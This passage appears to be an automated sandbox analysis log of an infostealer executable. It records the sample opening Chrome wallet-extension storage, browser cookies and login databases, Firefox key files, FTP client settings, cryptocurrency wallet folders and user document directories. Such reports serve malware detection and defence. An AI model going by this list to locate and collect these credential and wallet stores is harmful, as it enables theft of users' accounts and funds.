Source: C:\Users\user\AppData\Local\Temp\1008744001\3907f97605.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdo
Source: C:\Users\user\AppData\Local\Temp\1008744001\3907f97605.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopg
Source: C:\Users\user\AppData\Local\Temp\1008744001\3907f97605.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoa
Source: C:\Users\user\AppData\Local\Temp\1008744001\3907f97605.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdph
Source: C:\Users\user\AppData\Local\Temp\1008744001\3907f97605.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkld
Source: C:\Users\user\AppData\Local\Temp\1008744001\3907f97605.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolaf
Source: C:\Users\user\AppData\Local\Temp\1008744001\3907f97605.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddfffla
Source: C:\Users\user\AppData\Local\Temp\1008744001\3907f97605.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnid
Source: C:\Users\user\AppData\Local\Temp\1008744001\3907f97605.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfci
Source: C:\Users\user\AppData\Local\Temp\1008744001\3907f97605.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjeh
Source: C:\Users\user\AppData\Local\Temp\1008744001\3907f97605.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemg
Source: C:\Users\user\AppData\Local\Temp\1008744001\3907f97605.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhae
Source: C:\Users\user\AppData\Local\Temp\1008744001\3907f97605.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\key4.db
Source: C:\Users\user\AppData\Local\Temp\1008744001\3907f97605.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliof
Source: C:\Users\user\AppData\Local\Temp\1008744001\3907f97605.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneec
Source: C:\Users\user\AppData\Local\Temp\1008744001\3907f97605.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmon
Source: C:\Users\user\AppData\Local\Temp\1008744001\3907f97605.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhm
Source: C:\Users\user\AppData\Local\Temp\1008744001\3907f97605.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcm
Source: C:\Users\user\AppData\Local\Temp\1008744001\3907f97605.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcob
Source: C:\Users\user\AppData\Local\Temp\1008744001\3907f97605.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjh
Source: C:\Users\user\AppData\Local\Temp\1008744001\3907f97605.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflc
Source: C:\Users\user\AppData\Local\Temp\1008744001\3907f97605.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbg
Source: C:\Users\user\AppData\Local\Temp\1008744001\3907f97605.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Users\user\AppData\Local\Temp\1008744001\3907f97605.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahd
Source: C:\Users\user\AppData\Local\Temp\1008744001\3907f97605.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhk
Source: C:\Users\user\AppData\Local\Temp\1008744001\3907f97605.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbai
Source: C:\Users\user\AppData\Local\Temp\1008744001\3907f97605.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
Source: C:\Users\user\AppData\Local\Temp\1008744001\3907f97605.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgn
Source: C:\Users\user\AppData\Local\Temp\1008744001\3907f97605.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpi
Source: C:\Users\user\AppData\Local\Temp\1008744001\3907f97605.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite
Source: C:\Users\user\AppData\Local\Temp\1008744001\3907f97605.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifb
Source: C:\Users\user\AppData\Local\Temp\1008744001\3907f97605.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgk
Source: C:\Users\user\AppData\Local\Temp\1008744001\3907f97605.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbai
Source: C:\Users\user\AppData\Local\Temp\1008744001\3907f97605.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkd
Source: C:\Users\user\AppData\Local\Temp\1008744001\3907f97605.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account
Source: C:\Users\user\AppData\Local\Temp\1008744001\3907f97605.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimn
Source: C:\Users\user\AppData\Local\Temp\1008744001\3907f97605.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfj
Source: C:\Users\user\AppData\Local\Temp\1008744001\3907f97605.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohao
Source: C:\Users\user\AppData\Local\Temp\1008744001\3907f97605.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For Account
Source: C:\Users\user\AppData\Local\Temp\1008744001\3907f97605.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjk
Source: C:\Users\user\AppData\Local\Temp\1008744001\3907f97605.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnf
Source: C:\Users\user\AppData\Local\Temp\1008744001\3907f97605.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofec
Source: C:\Users\user\AppData\Local\Temp\1008744001\3907f97605.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihd
Source: C:\Users\user\AppData\Local\Temp\1008744001\3907f97605.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcje
Source: C:\Users\user\AppData\Local\Temp\1008744001\3907f97605.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaoc
Source: C:\Users\user\AppData\Local\Temp\1008744001\3907f97605.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdno
Source: C:\Users\user\AppData\Local\Temp\1008744001\3907f97605.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdaf
Source: C:\Users\user\AppData\Local\Temp\1008744001\3907f97605.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cert9.db
Source: C:\Users\user\AppData\Local\Temp\1008744001\3907f97605.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkm
Source: C:\Users\user\AppData\Local\Temp\1008744001\3907f97605.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\formhistory.sqlite
Source: C:\Users\user\AppData\Local\Temp\1008744001\3907f97605.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbic
Source: C:\Users\user\AppData\Local\Temp\1008744001\3907f97605.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoadd
Source: C:\Users\user\AppData\Local\Temp\1008744001\3907f97605.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhi
Source: C:\Users\user\AppData\Local\Temp\1008744001\3907f97605.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeap
Source: C:\Users\user\AppData\Local\Temp\1008744001\3907f97605.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihoh
Source: C:\Users\user\AppData\Local\Temp\1008744001\3907f97605.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpa
Source: C:\Users\user\AppData\Local\Temp\1008744001\3907f97605.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbn
Source: C:\Users\user\AppData\Local\Temp\1008744001\3907f97605.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaad
Source: C:\Users\user\AppData\Local\Temp\1008744001\3907f97605.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\logins.json
Source: C:\Users\user\AppData\Local\Temp\1008744001\3907f97605.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilc
Source: C:\Users\user\AppData\Local\Temp\1008744001\3907f97605.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclg
Source: C:\Users\user\AppData\Local\Temp\1008744001\3907f97605.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoa
Source: C:\Users\user\AppData\Local\Temp\1008744001\3907f97605.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchh
Source: C:\Users\user\AppData\Local\Temp\1008744001\3907f97605.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
Source: C:\Users\user\AppData\Local\Temp\1008744001\3907f97605.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn
Source: C:\Users\user\AppData\Local\Temp\1008744001\3907f97605.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfdd
Source: C:\Users\user\AppData\Local\Temp\1008744001\3907f97605.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpak
Source: C:\Users\user\AppData\Local\Temp\1008744001\3907f97605.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjp
Source: C:\Users\user\AppData\Local\Temp\1008744001\3907f97605.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpo
Source: C:\Users\user\AppData\Local\Temp\1008744001\3907f97605.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgpp
Source: C:\Users\user\AppData\Local\Temp\1008744001\3907f97605.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite
Source: C:\Users\user\AppData\Local\Temp\1008744001\3907f97605.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles
Source: C:\Users\user\AppData\Local\Temp\1008744001\3907f97605.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblb
Source: C:\Users\user\AppData\Local\Temp\1008744001\3907f97605.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbch
Source: C:\Users\user\AppData\Local\Temp\1008744001\3907f97605.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbm
Source: C:\Users\user\AppData\Local\Temp\1008744001\3907f97605.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbch
Source: C:\Users\user\AppData\Local\Temp\1008744001\3907f97605.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfe
Source: C:\Users\user\AppData\Local\Temp\1008744001\3907f97605.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmj
Source: C:\Users\user\AppData\Local\Temp\1008744001\3907f97605.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffne
Source: C:\Users\user\AppData\Local\Temp\1008744001\3907f97605.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklk
Source: C:\Users\user\AppData\Local\Temp\1008744001\3907f97605.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdma
Source: C:\Users\user\AppData\Local\Temp\1008744001\3907f97605.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdil
Source: C:\Users\user\AppData\Local\Temp\1008744001\3907f97605.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapac
Source: C:\Users\user\AppData\Local\Temp\1008744001\3907f97605.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnkno
Source: C:\Users\user\AppData\Local\Temp\1008744001\3907f97605.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimig
Source: C:\Users\user\AppData\Local\Temp\1008744001\3907f97605.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncg
Source: C:\Users\user\AppData\Local\Temp\1008744001\3907f97605.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolb
Source: C:\Users\user\AppData\Local\Temp\1008744001\3907f97605.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcob
Source: C:\Users\user\AppData\Local\Temp\1008744001\3907f97605.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnba
Source: C:\Users\user\AppData\Local\Temp\1008744001\3907f97605.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddfffla
Source: C:\Users\user\AppData\Local\Temp\1008744001\3907f97605.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjih
Source: C:\Users\user\AppData\Local\Temp\1008744001\3907f97605.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcge
Source: C:\Users\user\AppData\Local\Temp\1008744001\3907f97605.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgik
Source: C:\Users\user\AppData\Local\Temp\1008744001\3907f97605.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhad
Source: C:\Users\user\AppData\Local\Temp\1008744001\3907f97605.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgef
Source: C:\Users\user\AppData\Local\Temp\1008744001\3907f97605.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbb
Source: C:\Users\user\AppData\Local\Temp\1008744001\3907f97605.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
Source: C:\Users\user\AppData\Local\Temp\1008744001\3907f97605.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkp
Source: C:\Users\user\AppData\Local\Temp\1008744001\3907f97605.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcellj
Tries to harvest and steal ftp login credentials
Source: C:\Users\user\AppData\Local\Temp\1008744001\3907f97605.exe File opened: C:\Users\user\AppData\Roaming\FTPGetter
Source: C:\Users\user\AppData\Local\Temp\1008744001\3907f97605.exe File opened: C:\Users\user\AppData\Roaming\FTPInfo
Source: C:\Users\user\AppData\Local\Temp\1008744001\3907f97605.exe File opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites
Source: C:\Users\user\AppData\Local\Temp\1008744001\3907f97605.exe File opened: C:\Users\user\AppData\Roaming\FTPbox
Source: C:\Users\user\AppData\Local\Temp\1008744001\3907f97605.exe File opened: C:\Users\user\AppData\Roaming\FTPRush
Source: C:\Users\user\AppData\Local\Temp\1008744001\3907f97605.exe File opened: C:\Users\user\AppData\Roaming\Conceptworld\Notezilla
Source: C:\Users\user\AppData\Local\Temp\1008744001\3907f97605.exe File opened: C:\ProgramData\SiteDesigner\3D-FTP
Tries to steal Crypto Currency Wallets
Source: C:\Users\user\AppData\Local\Temp\1008744001\3907f97605.exe File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
Source: C:\Users\user\AppData\Local\Temp\1008744001\3907f97605.exe File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
Source: C:\Users\user\AppData\Local\Temp\1008744001\3907f97605.exe File opened: C:\Users\user\AppData\Roaming\Ledger Live
Source: C:\Users\user\AppData\Local\Temp\1008744001\3907f97605.exe File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb
Source: C:\Users\user\AppData\Local\Temp\1008744001\3907f97605.exe File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
Source: C:\Users\user\AppData\Local\Temp\1008744001\3907f97605.exe File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
Source: C:\Users\user\AppData\Local\Temp\1008744001\3907f97605.exe File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets
Source: C:\Users\user\AppData\Local\Temp\1008744001\3907f97605.exe File opened: C:\Users\user\AppData\Roaming\Binance
Source: C:\Users\user\AppData\Local\Temp\1008744001\3907f97605.exe File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB
Source: C:\Users\user\AppData\Local\Temp\1008744001\3907f97605.exe File opened: C:\Users\user\AppData\Roaming\Electrum\wallets
Source: C:\Users\user\AppData\Local\Temp\1008744001\3907f97605.exe File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets
Source: C:\Users\user\AppData\Local\Temp\1008744001\3907f97605.exe File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB
Source: C:\Users\user\AppData\Local\Temp\1008744001\3907f97605.exe File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
Source: C:\Users\user\AppData\Local\Temp\1008744001\3907f97605.exe File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
Source: C:\Users\user\AppData\Local\Temp\1008744001\3907f97605.exe File opened: C:\Users\user\AppData\Roaming\Ledger Live
Source: C:\Users\user\AppData\Local\Temp\1008744001\3907f97605.exe File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb
Source: C:\Users\user\AppData\Local\Temp\1008744001\3907f97605.exe File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
Source: C:\Users\user\AppData\Local\Temp\1008744001\3907f97605.exe File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
Source: C:\Users\user\AppData\Local\Temp\1008744001\3907f97605.exe File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets
Source: C:\Users\user\AppData\Local\Temp\1008744001\3907f97605.exe File opened: C:\Users\user\AppData\Roaming\Binance
Source: C:\Users\user\AppData\Local\Temp\1008744001\3907f97605.exe File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB
Source: C:\Users\user\AppData\Local\Temp\1008744001\3907f97605.exe File opened: C:\Users\user\AppData\Roaming\Electrum\wallets
Source: C:\Users\user\AppData\Local\Temp\1008744001\3907f97605.exe File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets
Source: C:\Users\user\AppData\Local\Temp\1008744001\3907f97605.exe File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB
Searches for user specific document files
Source: C:\Users\user\AppData\Local\Temp\1008744001\3907f97605.exe Directory queried: C:\Users\user\Documents\UOOJJOZIRH
Source: C:\Users\user\AppData\Local\Temp\1008744001\3907f97605.exe Directory queried: C:\Users\user\Documents\UOOJJOZIRH
Source: C:\Users\user\AppData\Local\Temp\1008744001\3907f97605.exe Directory queried: C:\Users\user\Documents\VLZDGUKUTZ
Source: C:\Users\user\AppData\Local\Temp\1008744001\3907f97605.exe Directory queried: C:\Users\user\Documents\VLZDGUKUTZ
Source: C:\Users\user\AppData\Local\Temp\1008744001\3907f97605.exe Directory queried: C:\Users\user\Documents\BPMLNOBVSB
Source: C:\Users\user\AppData\Local\Temp\1008744001\3907f97605.exe Directory queried: C:\Users\user\Documents\BPMLNOBVSB
Source: C:\Users\user\AppData\Local\Temp\1008744001\3907f97605.exe Directory queried: C:\Users\user\Documents\BPMLNOBVSB
Source: C:\Users\user\AppData\Local\Temp\1008744001\3907f97605.exe Directory queried: C:\Users\user\Documents\BPMLNOBVSB
Source: C:\Users\user\AppData\Local\Temp\1008744001\3907f97605.exe Directory queried: C:\Users\user\Documents\DVWHKMNFNN
Source: C:\Users\user\AppData\Local\Temp\1008744001\3907f97605.exe Directory queried: C:\Users\user\Documents\DVWHKMNFNN
Source: C:\Users\user\AppData\Local\Temp\1008744001\3907f97605.exe Directory queried: C:\Users\user\Documents\LTKMYBSEYZ
Source: C:\Users\user\AppData\Local\Temp\1008744001\3907f97605.exe Directory queried: C:\Users\user\Documents\LTKMYBSEYZ
Source: C:\Users\user\AppData\Local\Temp\1008744001\3907f97605.exe Directory queried: C:\Users\user\Documents\NEBFQQYWPS
Source: C:\Users\user\AppData\Local\Temp\1008744001\3907f97605.exe Directory queried: C:\Users\user\Documents\NEBFQQYWPS
Source: C:\Users\user\AppData\Local\Temp\1008744001\3907f97605.exe Directory queried: C:\Users\user\Documents\UMMBDNEQBN
Source: C:\Users\user\AppData\Local\Temp\1008744001\3907f97605.exe Directory queried: C:\Users\user\Documents\UMMBDNEQBN
Source: C:\Users\user\AppData\Local\Temp\1008744001\3907f97605.exe Directory queried: C:\Users\user\Documents\VLZDGUKUTZ
Source: C:\Users\user\AppData\Local\Temp\1008744001\3907f97605.exe Directory queried: C:\Users\user\Documents\VLZDGUKUTZ
Source: C:\Users\user\AppData\Local\Temp\1008744001\3907f97605.exe Directory queried: C:\Users\user\Documents\ZBEDCJPBEY
Source: C:\Users\user\AppData\Local\Temp\1008744001\3907f97605.exe Directory queried: C:\Users\user\Documents\ZBEDCJPBEY
Source: C:\Users\user\AppData\Local\Temp\1008744001\3907f97605.exe Directory queried: C:\Users\user\Documents\ZTGJILHXQB
Source: C:\Users\user\AppData\Local\Temp\1008744001\3907f97605.exe Directory queried: C:\Users\user\Documents\ZTGJILHXQB
Source: C:\Users\user\AppData\Local\Temp\1008744001\3907f97605.exe Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1008744001\3907f97605.exe Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1008744001\3907f97605.exe Directory queried: C:\Users\user\Documents\BPMLNOBVSB
Source: C:\Users\user\AppData\Local\Temp\1008744001\3907f97605.exe Directory queried: C:\Users\user\Documents\BPMLNOBVSB
Source: C:\Users\user\AppData\Local\Temp\1008744001\3907f97605.exe Directory queried: C:\Users\user\Documents\ONBQCLYSPU
Source: C:\Users\user\AppData\Local\Temp\1008744001\3907f97605.exe Directory queried: C:\Users\user\Documents\ONBQCLYSPU
Source: C:\Users\user\AppData\Local\Temp\1008744001\3907f97605.exe Directory queried: C:\Users\user\Documents\ZBEDCJPBEY
Source: C:\Users\user\AppData\Local\Temp\1008744001\3907f97605.exe Directory queried: C:\Users\user\Documents\ZBEDCJPBEY
Source: C:\Users\user\AppData\Local\Temp\1008744001\3907f97605.exe Directory queried: C:\Users\user\Documents\DVWHKMNFNN
Source: C:\Users\user\AppData\Local\Temp\1008744001\3907f97605.exe Directory queried: C:\Users\user\Documents\DVWHKMNFNN
Source: C:\Users\user\AppData\Local\Temp\1008744001\3907f97605.exe Directory queried: C:\Users\user\Documents\ONBQCLYSPU
Source: C:\Users\user\AppData\Local\Temp\1008744001\3907f97605.exe Directory queried: C:\Users\user\Documents\ONBQCLYSPU
Source: C:\Users\user\AppData\Local\Temp\1008744001\3907f97605.exe Directory queried: C:\Users\user\Documents\UMMBDNEQBN
Source: C:\Users\user\AppData\Local\Temp\1008744001\3907f97605.exe Directory queried: C:\Users\user\Documents\UMMBDNEQBN
Source: C:\Users\user\AppData\Local\Temp\1008744001\3907f97605.exe Directory queried: C:\Users\user\Documents\VLZDGUKUTZ
Source: C:\Users\user\AppData\Local\Temp\1008744001\3907f97605.exe Directory queried: C:\Users\user\Documents\VLZDGUKUTZ
Source: C:\Users\user\AppData\Local\Temp\1008744001\3907f97605.exe Directory queried: C:\Users\user\Documents\XZXHAVGRAG
Source: C:\Users\user\AppData\Local\Temp\1008744001\3907f97605.exe Directory queried: C:\Users\user\Documents\XZXHAVGRAG
Source: C:\Users\user\AppData\Local\Temp\1008744001\3907f97605.exe Directory queried: C:\Users\user\Documents\ZBEDCJPBEY
Source: C:\Users\user\AppData\Local\Temp\1008744001\3907f97605.exe Directory queried: C:\Users\user\Documents\ZBEDCJPBEY
Source: C:\Users\user\AppData\Local\Temp\1008744001\3907f97605.exe Directory queried: C:\Users\user\Documents\BPMLNOBVSB
Source: C:\Users\user\AppData\Local\Temp\1008744001\3907f97605.exe Directory queried: C:\Users\user\Documents\BPMLNOBVSB
Source: C:\Users\user\AppData\Local\Temp\1008744001\3907f97605.exe Directory queried: C:\Users\user\Documents\QNCYCDFIJJ
Source: C:\Users\user\AppData\Local\Temp\1008744001\3907f97605.exe Directory queried: C:\Users\user\Documents\QNCYCDFIJJ
